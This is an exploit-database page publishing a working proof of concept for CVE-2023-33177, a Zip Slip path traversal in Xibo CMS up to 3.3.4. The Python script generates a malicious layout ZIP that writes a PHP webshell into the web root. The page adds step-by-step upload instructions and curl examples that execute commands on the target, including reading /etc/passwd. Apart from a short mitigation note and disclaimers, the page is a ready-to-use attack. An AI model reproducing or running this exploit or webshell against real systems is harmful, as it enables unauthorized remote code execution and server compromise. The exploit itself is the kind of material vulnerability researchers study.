Skip to main content
Home/Exploits/WebApps/xibocms 3.3.4 – RCE
EXPLOIT CRITICAL (9.8)

xibocms 3.3.4 – RCE

CVE ID: CVE-2023-33177
Vulnerability Type: Remote Code Execution (RCE)
Author: complexusprada
Categories: WebApps

xibocms 3.3.4 – RCE

Proof of Concept (PoC)

poc.sh 
# Exploit Title: XiboCMS 3.3.4-  Remote Code Execution
# Google Dork: N/A
# Date: 2025-11-18
# Exploit Author: complexusprada
# Vendor Homepage: https://xibo.org.uk/
# Software Link: https://github.com/xibosignage/xibo-cms
# Version: 1.8.0 - 2.3.16, 3.0.0 - 3.3.4
# Tested on: Ubuntu Linux (Docker), Xibo CMS 3.3.4
# CVE: CVE-2023-33177
# GHSA: GHSA-jj27-x85q-crqv
# Category: webapps

"""
# Vulnerability Description:
# Xibo CMS contains a path traversal vulnerability (Zip Slip) in the layout import
# functionality. The application fails to properly validate file paths in the mapping.json
# file within uploaded ZIP archives, allowing authenticated attackers to write files
# outside the intended library directory using path traversal sequences (../../).
# This results in arbitrary file upload and remote code execution.

# Exploitation Details:
# 1. Attacker creates a malicious ZIP file containing a valid Xibo layout structure
# 2. The mapping.json file contains a path traversal payload (../../web/shell.php)
# 3. A PHP webshell is placed at the corresponding path within the ZIP structure
# 4. When the layout is imported, Xibo extracts files without proper path validation
# 5. The webshell is written to the web root (/var/www/cms/web/shell.php)
# 6. Attacker gains remote code execution via the webshell

# Vulnerability Chain:
# ZIP contains:  library/../../web/shell.php
# Mapping.json:  {"file": "../../web/shell.php", ...}
# Xibo reads:    library/ + ../../web/shell.php
# Xibo writes:   /var/www/cms/library/temp/ + ../../web/shell.php
# Result:        /var/www/cms/web/shell.php (webshell in web root!)

# Prerequisites:
# - Valid Xibo CMS credentials (any authenticated user with layout import permission)
# - Xibo CMS versions 1.8.0 - 2.3.16 or 3.0.0 - 3.3.4

# Exploitation Steps:
# 1. Run this script to generate exploit.zip
# 2. Log in to Xibo CMS
# 3. Navigate to: Design → Layouts → Import
# 4. Upload the generated exploit.zip file
# 5. Even if JSON errors occur, the webshell has been written to disk
# 6. Access webshell at: http://<target>/shell.php?cmd=<command>
# Example: curl 'http://target/shell.php?cmd=id'

# Mitigation:
# Upgrade to patched versions:
# - Xibo CMS 2.3.17+ (for 2.x branch)
# - Xibo CMS 3.3.5+ (for 3.x branch)

# Disclaimer:
# This exploit is provided for educational purposes, authorized penetration testing,
# and vulnerability research only. Only use against systems you own or have explicit
# written permission to test.
"""

import zipfile
import json
import sys

def create_exploit():
    """Generate the malicious ZIP file for Xibo CMS RCE exploit"""

    print("[*] Xibo CMS Zip Slip RCE Exploit Generator")
    print("[*] CVE-2023-33177 - Path Traversal via Layout Import")
    print("[*] Affected: Xibo CMS 1.8.0-2.3.16, 3.0.0-3.3.4n")

    # Valid Xibo 3.0 layout structure
    # This ensures the ZIP passes initial validation checks
    layout_json = {
        "layout": "Exploit Layout",
        "description": "Path Traversal Test",
        "layoutDefinitions": {
            "schemaVersion": 3,
            "width": 1920,
            "height": 1080,
            "backgroundColor": "#000000",
            "backgroundzIndex": 0,
            "code": "CVE-2023-33177",
            "actions": [],
            "regions": [],
            "drawers": []
        }
    }

    # Empty playlist - triggers JSON import code path
    playlist_json = {}

    # VULNERABILITY: Path traversal in mapping.json
    # The 'file' field is not properly sanitized before file extraction
    # Xibo constructs the extraction path as: library/temp/ + file['file']
    # Using ../../ allows escaping the library directory
    mapping_json = [{
        "file": "../../web/shell.php",  # Path traversal payload
        "name": "shell.php",
        "type": "module"
    }]

    # Simple PHP webshell for command execution
    # Accepts commands via GET parameter: ?cmd=<command>
    webshell = b'<?php system($_GET["cmd"]); ?>'

    # Create the malicious ZIP file
    try:
        with zipfile.ZipFile('exploit.zip', 'w', zipfile.ZIP_DEFLATED) as zf:
            # Add required Xibo layout files
            zf.writestr('layout.json', json.dumps(layout_json, indent=2))
            zf.writestr('playlist.json', json.dumps(playlist_json))
            zf.writestr('mapping.json', json.dumps(mapping_json))

            # CRITICAL: The file path in the ZIP must match what Xibo expects
            # Xibo calls: $zip->getStream('library/' . $file['file'])
            # Therefore we place the file at: library/../../web/shell.php
            zf.writestr('library/../../web/shell.php', webshell)

        print("[+] Exploit ZIP created successfully: exploit.zip")
        print("n[*] Exploitation Steps:")
        print("    1. Log in to Xibo CMS with valid credentials")
        print("    2. Navigate to: Design → Layouts → Import")
        print("    3. Upload exploit.zip")
        print("    4. Ignore any JSON errors (file is already written)")
        print("    5. Access webshell: http://<target>/shell.php?cmd=<command>")
        print("n[*] Example:")
        print("    curl 'http://target/shell.php?cmd=id'")
        print("    curl 'http://target/shell.php?cmd=cat%20/etc/passwd'")
        print()

    except Exception as e:
        print(f"[-] Error creating exploit: {e}", file=sys.stderr)
        sys.exit(1)

if __name__ == "__main__":
    create_exploit()

Security Disclaimer

This exploit is provided for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal and may result in severe legal consequences. Always ensure you have explicit permission before testing vulnerabilities.

sh3llz@loading:~$
Loading security modules...